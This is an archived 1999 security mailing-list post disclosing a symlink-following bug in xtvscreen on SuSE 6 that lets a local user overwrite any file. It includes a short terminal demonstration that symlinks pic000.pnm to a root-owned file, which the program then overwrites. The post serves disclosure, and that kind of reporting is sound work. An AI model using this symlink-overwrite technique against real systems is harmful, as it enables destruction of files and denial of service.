xtvscreen and suse 6

From: Andre Cruz (afafcat_private)
Date: Thu Feb 18 1999 - 07:54:24 PST

Next message: alexander tampermeier: "ISS Internet Scanner Brute Force Bug"

Previous message: Don Lewis: "Re: [HERT] Advisory #002 Buffer overflow in lsof"
Next in thread: Alan Cox: "Re: xtvscreen and suse 6"
Reply: Alan Cox: "Re: xtvscreen and suse 6"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

You can use xtvscreen to overwrite any file on the system.
Xtvscreen has a function to capture a snapshot and will write it as
pic000.pnm, pic001.pnm, etc in it's working directory. It follows
symlinks.
root@korn:/tmp > ls -l exp
-rw-r--r--   1 root     root            4 Feb 18 15:42 exp
edevil@korn:~ > ln -s /tmp/exp pic000.pnm
edevil@korn:~ > xtvscreen
Sound mixer initialized !
Using Visual TrueColor
msize: 0x00640000
/*
Start->Capture goes here
Start->Snapshot goes here */
[1]+  Stopped                 xtvscreen
edevil@korn:~ > cd /tmp
edevil@korn:/tmp > ls -l exp
-rw-r--r--   1 root     root       453135 Feb 18 15:47 exp
edevil@korn:/tmp >
I don't know how to write arbitrary data to the file but it can be used
for DoS.
If this is already known I'm sorry.

---
Andre Cruz
afafcat_private

Next message: alexander tampermeier: "ISS Internet Scanner Brute Force Bug"
Previous message: Don Lewis: "Re: [HERT] Advisory #002 Buffer overflow in lsof"
Next in thread: Alan Cox: "Re: xtvscreen and suse 6"
Reply: Alan Cox: "Re: xtvscreen and suse 6"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:35:29 PDT